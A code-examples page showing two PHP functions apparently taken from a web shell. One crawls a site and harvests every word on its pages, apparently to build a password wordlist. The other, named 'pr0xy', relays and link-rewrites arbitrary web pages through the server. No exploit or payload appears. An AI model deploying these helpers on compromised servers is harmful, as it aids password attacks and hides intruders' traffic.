Example #1
0
function Site2profile($urL, $level)
{
    global $CheckedLinks, $GrabedWords;
    echo ".";
    @flush_buffers();
    if ($level == 0) {
        return 0;
    }
    if (in_array($urL, $CheckedLinks)) {
        return null;
    }
    $headers = array();
    $con = getiT($urL, $headers);
    if (!strstr($headers['Content-Type'], 'text/')) {
        return null;
    }
    $CheckedLinks[] = $urL;
    $u = parse_url($urL);
    $file = !empty($u['path']) ? $u['path'] : '/';
    $port = !empty($u['port']) ? ":" . $u['port'] : '';
    $dir = str_replace(DIRECTORY_SEPARATOR, '/', dirname($file));
    $txt = strip_tags($con);
    $txt = str_replace("\n", " ", $txt);
    $twords = explode(" ", $txt);
    foreach ($twords as $word) {
        $word = trim($word);
        if ($word && !in_array($word, $GrabedWords)) {
            $GrabedWords[] = trim($word);
        }
    }
    $dom = new DOMDocument();
    @$dom->loadHTML($con);
    $dom->preserveWhiteSpace = false;
    $xpath = new DOMXPath($dom);
    $hrefs = $xpath->evaluate("/html/body//a");
    for ($i = 0; $i < $hrefs->length; $i++) {
        $href = $hrefs->item($i);
        $url = $href->getAttribute('href');
        if (!empty($url)) {
            $pre = '';
            if (substr($url, 0, 4) != 'http') {
                $pre = $u['scheme'] . "://" . $u['host'] . $port;
                if ($url[0] != '/') {
                    $pre .= $dir;
                }
            }
            $url = $pre . $url;
            Site2profile($url, $level - 1);
        }
    }
}
Example #2
0
function pr0xy()
{
    global $errorbox, $et, $footer, $hcwd;
    echo "<table border=0 cellpadding=0 cellspacing=0 style='border-collapse: collapse' bgcolor='#333333' width='100%'><form method='POST'><tr><td width='20%'><b>Navigator: </b><input type=text name=urL size=140 value='";
    if (!!empty($_REQUEST['urL'])) {
        echo 'http://www.edpsciences.org/htbin/ipaddress';
    } else {
        echo htmlspecialchars($_REQUEST['urL']);
    }
    echo "'>{$hcwd}<input type=submit class=buttons value=Go></form>{$et}";
    if (!empty($_REQUEST['urL'])) {
        $u = parse_url($_REQUEST['urL']);
        $host = $u['host'];
        $file = !empty($u['path']) ? $u['path'] : '/';
        $dir = dirname($file);
        $con = getiT($_REQUEST['urL']);
        $s = array("href=mailto" => "HrEf=mailto", "HREF=mailto" => "HrEf=mailto", "href='mailto" => "HrEf=\"mailto", "HREF=\"mailto" => "HrEf=\"mailto", "href=\\'mailto" => "HrEf=\"mailto", "HREF=\\'mailto" => "HrEf=\"mailto", "href=\"http" => "HrEf=\"" . hlinK("seC=px&urL=http"), "href=\\'http" => "HrEf=\"" . hlinK("seC=px&urL=http"), "HREF=\\'http" => "HrEf=\"" . hlinK("seC=px&urL=http"), "href=http" => "HrEf=" . hlinK("seC=px&urL=http"), "HREF=http" => "HrEf=" . hlinK("seC=px&urL=http"), "href=\"" => "HrEf=\"" . hlinK("seC=px&urL=http://{$host}/{$dir}/"), "HREF=\"" => "HrEf=\"" . hlinK("seC=px&urL=http://{$host}/{$dir}/"), "href=\"" => "HrEf=\\'" . hlinK("seC=px&urL=http://{$host}/{$dir}/"), 'HREF="' => 'HrEf="' . hlinK("seC=px&urL=http://{$host}/{$dir}/"), "href=" => "HrEf=" . hlinK("seC=px&urL=http://{$host}/{$dir}/"), "HREF=" => "HrEf=" . hlinK("seC=px&urL=http://{$host}/{$dir}/"));
        $con = replace_stR($s, $con);
        echo $con;
    }
}